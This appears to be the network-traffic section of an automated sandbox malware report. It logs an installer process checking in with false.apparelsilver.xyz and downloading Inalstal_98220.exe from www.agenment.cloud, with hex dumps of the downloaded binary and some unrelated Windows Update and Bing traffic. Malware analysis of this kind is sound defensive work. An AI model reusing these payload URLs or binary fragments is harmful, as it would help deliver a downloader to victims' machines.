                                                                                                                                                                                                                                                                        2023-12-06 13:33:07 UTC589INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 35 2e 33 38 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 59 75 57 50 6c 35 41
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:33:07 GMTContent-Type: text/plainContent-Length: 2Connection: closeX-Powered-By: PHP/5.5.38CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YuWPl5A


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.549708172.67.198.1514431992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:07 UTC179OUTGET /ss.php?a=3890&cc=US&t=1701869569 HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: false.apparelsilver.xyz
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:08 UTC593INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 35 2e 33 38 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 62 4b 36 32 79 49 7a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:33:08 GMTContent-Type: text/plainContent-Length: 2Connection: closeX-Powered-By: PHP/5.5.38CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bK62yIz
                                                                                                                                                                                                                                                                        2023-12-06 13:33:08 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                                                        Data Ascii: ok


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.549709185.23.108.2244431992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:08 UTC165OUTHEAD /win/Inalstal_98220.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: www.agenment.cloud
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:09 UTC261INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 30 38 37 38 33 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 30 35 20 44 65 63 20 32 30 32 33 20 31 39 3a 34 31 3a 32 32 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 61 39 32 66 64 66 2d 36 30 62 63 38 36 62 35 34 62 65 64 34 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Wed, 06 Dec 2023 13:33:08 GMTContent-Type: application/octet-streamContent-Length: 11087839Connection: closeLast-Modified: Tue, 05 Dec 2023 19:41:22 GMTETag: "a92fdf-60bc86b54bed4"Accept-Ranges: byt


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.549710185.23.108.2244431992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:09 UTC164OUTGET /win/Inalstal_98220.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: www.agenment.cloud
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:09 UTC261INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 30 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 30 38 37 38 33 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 30 35 20 44 65 63 20 32 30 32 33 20 31 39 3a 34 31 3a 32 32 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 61 39 32 66 64 66 2d 36 30 62 63 38 36 62 35 34 62 65 64 34 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Wed, 06 Dec 2023 13:33:09 GMTContent-Type: application/octet-streamContent-Length: 11087839Connection: closeLast-Modified: Tue, 05 Dec 2023 19:41:22 GMTETag: "a92fdf-60bc86b54bed4"Accept-Ranges: byt
                                                                                                                                                                                                                                                                        2023-12-06 13:33:09 UTC16123INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                                                        2023-12-06 13:33:09 UTC16384INData Raw: 8c db 4b 00 00 0f 95 c0 c3 53 8b d8 e8 84 ff ff ff 84 c0 74 29 a1 8c db 4b 00 81 38 fe 3f 00 00 7d 1c a1 8c db 4b 00 8b 00 8b 15 8c db 4b 00 89 5c 82 04 a1 8c db 4b 00 ff 00 b0 01 eb 02 33 c0 c6 05 90 db 4b 00 00 5b c3 53 56 57 8b f0 bf 8c db 4b 00 33 db 83 3f 00 74 3f e8 36 ff ff ff 84 c0 74 36 8b 07 8b 10 4a 85 d2 7c 26 42 33 c0 8b 0f 3b 74 81 04 75 17 8b 17 8b 12 8b 0f 8b 14 91 8b 0f 89 54 81 04 8b 17 ff 0a b3 01 eb 04 40 4a 75 dd c6 05 90 db 4b 00 00 8b c3 5f 5e 5b c3 8b c0 55 8b ec 83 c4 d8 53 56 57 89 45 fc 8b 45 fc 8b 00 81 e8 80 70 4b 00 c1 e8 05 c1 e0 08 8b 55 08 8d b4 c2 00 48 fe ff 8d 4d dc 8d 55 e0 8b 45 fc e8 c7 fc ff ff e9 6d 01 00 00 8b 45 e0 83 e8 04 f6 00 01 0f 85 52 01 00 00 8b 45 e0 e8 57 ff ff ff 84 c0 0f 85 42 01 00 00 8b 45 08 c6 80
                                                                                                                                                                                                                                                                        Data Ascii: KSt)K8?}KK\K3K[SVWK3?t?6t6J|&B3;tuT@JuK_^[USVWEEpKUHMUEmEREWBE
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: 24 0f b7 08 66 3b 0a 74 39 66 3b 4a 02 74 36 83 c2 08 3b 54 24 08 72 18 83 c2 fc 3b 54 24 08 72 e3 83 c4 0c 8b 04 24 0b 44 24 04 5b 5e 31 c0 c3 66 3b 4a fc 74 09 66 3b 4a fe 75 c8 83 c2 02 83 c2 fc 83 c2 fe 8b 34 24 85 f6 74 1d 8b 1c 30 3b 5c 32 02 75 ba 83 fe fc 7d 0f 8b 5c 30 04 3b 5c 32 06 75 ab 83 c6 08 7c e3 8b 44 24 04 83 c2 04 3b 54 24 08 77 ab 83 c4 0c 8b 0c 24 0b 4c 24 04 74 08 89 c3 89 d6 89 d8 89 f2 01 d0 d1 e8 5b 5e c3 55 8b ec 53 0f b7 5d 08 53 e8 62 f0 ff ff 5b 5d c2 04 00 90 55 8b ec 53 0f b7 5d 08 53 e8 ce f1 ff ff 5b 5d c2 04 00 90 31 c9 53 8a 4a 01 56 57 8d 74 11 0a 8b 7c 11 06 89 c3 85 ff 74 1d 8b 16 85 d2 74 11 8b 46 04 01 d8 8b 12 b9 01 00 00 00 e8 0b 00 00 00 83 c6 08 4f 7f e3 5f 5e 5b c3 90 85 c9 0f 84 8e 00 00 00 53 56 57 89 c3 89
                                                                                                                                                                                                                                                                        Data Ascii: $f;t9f;Jt6;T$r;T$r$D$[^1f;Jtf;Ju4$t0;\2u}\0;\2u|D$;T$w$L$t[^US]Sb[]US]S[]1SJVWt|ttFO_^[SVW
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: 48 04 3b 4a 04 75 10 8b 48 08 3b 4a 08 75 08 8b 40 0c 3b 42 0c 74 03 33 c0 c3 b0 01 c3 55 8b ec 33 c0 55 68 94 cb 40 00 64 ff 30 64 89 20 ff 05 8c b9 4b 00 75 55 b8 64 b0 4b 00 e8 f1 8c ff ff b8 40 b3 4b 00 e8 e7 8c ff ff b8 1c b6 4b 00 e8 dd 8c ff ff e8 ec d7 ff ff 83 3d 10 7c 4b 00 00 74 0a a1 10 7c 4b 00 e8 05 77 ff ff b8 d8 dc 4b 00 e8 27 f6 ff ff e8 0e 88 ff ff b8 d8 dc 4b 00 8b 15 50 b8 40 00 e8 0a c1 ff ff 33 c0 5a 59 59 64 89 10 68 9b cb 40 00 c3 e9 a3 a4 ff ff eb f8 5d c3 8d 40 00 55 8b ec 8b 55 08 8b 45 0c f0 87 02 5d c2 08 00 ff 25 30 23 4c 00 8b c0 ff 25 2c 23 4c 00 8b c0 ff 25 6c 24 4c 00 8b c0 ff 25 fc 22 4c 00 8b c0 ff 25 4c 24 4c 00 8b c0 ff 25 5c 24 4c 00 8b c0 ff 25 40 23 4c 00 8b c0 ff 25 58 23 4c 00 8b c0 ff 25 64 23 4c 00 8b c0 ff 25
                                                                                                                                                                                                                                                                        Data Ascii: H;JuH;Ju@;Bt3U3Uh@d0d KuUdK@KK=|Kt|KwK'KP@3ZYYdh@]@UUE]%0#L%,#L%l$L%"L%L$L%\$L%@#L%X#L%d#L%
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: 09 fe 13 50 09 08 01 45 09 08 01 08 01 08 01 16 16 00 05 08 01 08 01 08 01 08 01 4b 0a 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 41 05 8a 10 08 01 08 01 08 01 08 01 08 01 18 16 41 05 48 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 41 00 c6 06 61 00 0d 15 c2 06 1f 14 09 15 41 00 dd 00 d3 06 42 15 53 15 20 14 41 00 c6 06 61 00 b7 14 e1 06 61 00 b3 14 e1 14 ed 06 05 15 41 00 d9 00 61 00 41 00 c6 06 61 00 0d 15 c2 06 61 00 09 15 41 00 dd 00 05 15 41 00 d9 00 61 00 41 00 c6 06 61 00 55 14 41 00 1f 15 ec 00 0f 15 15 15 61 00 2b 15 41 00 1b 15 e8 00 0b 15 c8 00 61 00 ee 00 41 00 17 15 61 00 70 15 b5 15 b5 15 b5 15 8b 13 8b 13 8b 13 55 09 8b 13 8b 13 99 16 31 05 7c 14 80 13 8a 13 00 05 00 05 00 05 00 05 00 05 6d 09 81 07 b5 12 00 05 00 05 00 05
                                                                                                                                                                                                                                                                        Data Ascii: PEKAAHAaABS AaaAaAaaAAaAaUAa+AaAapU1|m
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: 08 2c 03 74 04 33 c0 eb 02 b0 01 5e 5b c3 8d 40 00 53 56 8b d8 0f b7 33 83 fe 7f 77 0c 83 c6 d0 83 ee 0a 0f 92 c0 5e 5b c3 81 fe ff 00 00 00 77 12 a1 88 e6 4b 00 0f b6 04 30 04 f3 2c 03 0f 92 c0 eb 0e 8b c6 e8 f7 fe ff ff 04 f3 2c 03 0f 92 c0 5e 5b c3 90 ff 05 78 e6 4b 00 c3 90 1a 00 00 00 cc 7d 4b 00 58 a5 4b 00 02 00 00 00 c4 7d 4b 00 a0 a7 4b 00 02 00 00 00 bc 7d 4b 00 f8 a5 4b 00 02 00 00 00 b4 7d 4b 00 34 a5 4b 00 02 00 00 00 ac 7d 4b 00 60 a6 4b 00 02 00 00 00 a4 7d 4b 00 94 a5 4b 00 02 00 00 00 9c 7d 4b 00 88 a4 4b 00 02 00 00 00 94 7d 4b 00 a0 a6 4b 00 02 00 00 00 8c 7d 4b 00 c4 a6 4b 00 02 00 00 00 84 7d 4b 00 18 a5 4b 00 02 00 00 00 7c 7d 4b 00 80 a5 4b 00 02 00 00 00 74 7d 4b 00 5c a4 4b 00 02 00 00 00 6c 7d 4b 00 bc a5 4b 00 02 00 00 00 64 7d
                                                                                                                                                                                                                                                                        Data Ascii: ,t3^[@SV3w^[wK0,,^[xK}KXK}KK}KK}K4K}K`K}KK}KK}KK}KK}KK|}KKt}K\Kl}KKd}
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: 6e 67 03 00 b8 12 40 00 10 00 05 08 9c 8b 41 00 00 00 04 53 65 6c 66 02 00 02 a4 31 40 00 01 00 05 42 79 74 65 73 02 00 00 9c 10 40 00 02 00 09 42 79 74 65 49 6e 64 65 78 02 00 00 9c 10 40 00 0c 00 09 42 79 74 65 43 6f 75 6e 74 02 00 40 b8 12 40 00 08 00 01 01 02 00 02 00 43 00 18 7c 4b 00 09 47 65 74 53 74 72 69 6e 67 03 00 b8 12 40 00 0c 00 03 08 9c 8b 41 00 00 00 04 53 65 6c 66 02 00 16 b4 10 40 00 01 00 05 42 79 74 65 73 02 00 40 b8 12 40 00 08 00 01 01 02 00 02 00 00 00 00 a0 8b 41 00 07 09 54 45 6e 63 6f 64 69 6e 67 bc 7a 41 00 88 1f 40 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 04 00 02 e9 8b 41 00 02 00 02 0c 8c 41 00 02 00 02 33 8c 41 00 02 00 02 56 8c 41 00 02 00 02 00 00 00 e4 10 40 00 10 00 00 fe 00 00 00 00 01 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: ng@ASelf1@Bytes@ByteIndex@ByteCount@@C|KGetString@ASelf@Bytes@@ATEncodingzA@System.SysUtilsAA3AVA@
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: 04 74 18 eb 36 8b 45 08 50 0f b7 45 fc 8b 55 e4 e8 24 fa ff ff 59 e9 e5 05 00 00 8b 45 08 50 0f b7 45 fc 8b 55 08 8b 92 30 fd ff ff 8b 44 82 20 e8 e8 f9 ff ff 59 e9 c5 05 00 00 8b 45 08 50 0f b7 45 fc 8b 55 08 8b 92 30 fd ff ff 8b 44 82 50 e8 c8 f9 ff ff 59 e9 a5 05 00 00 55 e8 24 fa ff ff 59 8b 45 e4 48 83 e8 02 72 11 74 2c 48 74 59 48 0f 84 82 00 00 00 e9 98 00 00 00 55 e8 37 fa ff ff 59 8b 45 08 50 0f b7 45 fa 8b 55 e4 e8 a6 f9 ff ff 59 e9 67 05 00 00 8b 45 08 50 8b 45 08 ff 70 0c ff 70 08 e8 d2 f7 ff ff 0f b7 c0 8b 55 08 8b 92 30 fd ff ff 8b 84 82 80 00 00 00 e8 5a f9 ff ff 59 e9 37 05 00 00 8b 45 08 50 8b 45 08 ff 70 0c ff 70 08 e8 a2 f7 ff ff 0f b7 c0 8b 55 08 8b 92 30 fd ff ff 8b 84 82 9c 00 00 00 e8 2a f9 ff ff 59 e9 07 05 00 00 8b 45 08 50 8b 45
                                                                                                                                                                                                                                                                        Data Ascii: t6EPEU$YEPEU0D YEPEU0DPYU$YEHrt,HtYHU7YEPEUYgEPEppU0ZY7EPEppU0*YEPE
                                                                                                                                                                                                                                                                        2023-12-06 13:33:10 UTC16384INData Raw: ff 8b c8 8b d4 8b c6 e8 a1 70 fe ff 81 c4 0c 02 00 00 5e 5b c3 e8 73 d6 fe ff 33 d2 e8 04 00 00 00 c3 8d 40 00 55 8b ec 83 c4 e0 53 56 33 c9 89 4d e0 8b f2 8b d8 33 c0 55 68 c0 0b 42 00 64 ff 30 64 89 20 85 db 74 41 89 5d e4 c6 45 e8 00 8d 4d e0 33 d2 8b c3 e8 72 d4 ff ff 8b 45 e0 89 45 ec c6 45 f0 11 89 75 f4 c6 45 f8 11 8d 45 e4 50 6a 02 8b 0d 90 a6 4b 00 b2 01 a1 38 69 41 00 e8 f5 e7 ff ff 89 45 fc eb 15 8b 0d 58 a7 4b 00 b2 01 a1 38 69 41 00 e8 a2 e7 ff ff 89 45 fc 8b 45 fc 89 58 18 ff 75 04 8b 45 fc e9 72 65 fe ff 33 c0 5a 59 59 64 89 10 68 c7 0b 42 00 8d 45 e0 e8 61 6e fe ff c3 e9 77 64 fe ff eb f0 5e 5b 8b e5 5d c3 8d 40 00 53 56 be 9c 92 4b 00 eb 0d 8b 1e 8b 03 89 06 8b c3 e8 26 48 fe ff 83 3e 00 75 ee 5e 5b c3 8b c0 53 68 28 0c 42 00 e8 ad d5 fe
                                                                                                                                                                                                                                                                        Data Ascii: p^[s3@USV3M3UhBd0d tA]EM3rEEEuEEPjK8iAEXK8iAEEXuEre3ZYYdhBEanwd^[]@SVK&H>u^[Sh(B


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.54971113.85.23.86443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gsFLpk9WD8mr+vo&MD=y8Xsl23L HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC560INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 30 30 30 31 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 58 41 6f 70 61 7a 56 30 30 58 44 57 6e 4a 43 77 6b 6d 45 57 52 76 36 4a 6b 62 6a 52 41 39 51 53 53 5a 32 2b 65 2f 33 4d 7a 45 6b 3d 5f 32 38 38 30 22 0d 0a 4d 53 2d 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 39 34 33 62 63 30 38 61 2d 62 30 31 64 2d 34 32 37 30 2d
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Type: application/octet-streamExpires: -1Last-Modified: Mon, 01 Jan 0001 00:00:00 GMTETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"MS-CorrelationId: 943bc08a-b01d-4270-
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        5192.168.2.54971523.1.237.91443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:15 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                                                                                                                        Origin: https://www.bing.com
                                                                                                                                                                                                                                                                        Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                                                                                                        Content-type: text/xml
                                                                                                                                                                                                                                                                        X-Agent-DeviceId: 01000A410900D492
                                                                                                                                                                                                                                                                        X-BM-CBT: 1696428841
                                                                                                                                                                                                                                                                        X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                                                                                                                        X-BM-DeviceDimensions: 784x984
                                                                                                                                                                                                                                                                        X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                                                                                                                        X-BM-DeviceScale: 100
                                                                                                                                                                                                                                                                        X-BM-DTZ: 120
                                                                                                                                                                                                                                                                        X-BM-Market: CH
                                                                                                                                                                                                                                                                        X-BM-Theme: 000000;0078d7
                                                                                                                                                                                                                                                                        X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                                                                                                                                        X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                                                                                                                                                                                        X-Device-isOptin: false
                                                                                                                                                                                                                                                                        X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                                                                                                                        X-Device-OSSKU: 48
                                                                                                                                                                                                                                                                        X-Device-Touch: false
                                                                                                                                                                                                                                                                        X-DeviceID: 01000A410900D492
                                                                                                                                                                                                                                                                        X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                                                                                                                                                                                        X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                                                                                                                        X-PositionerType: Desktop
                                                                                                                                                                                                                                                                        X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
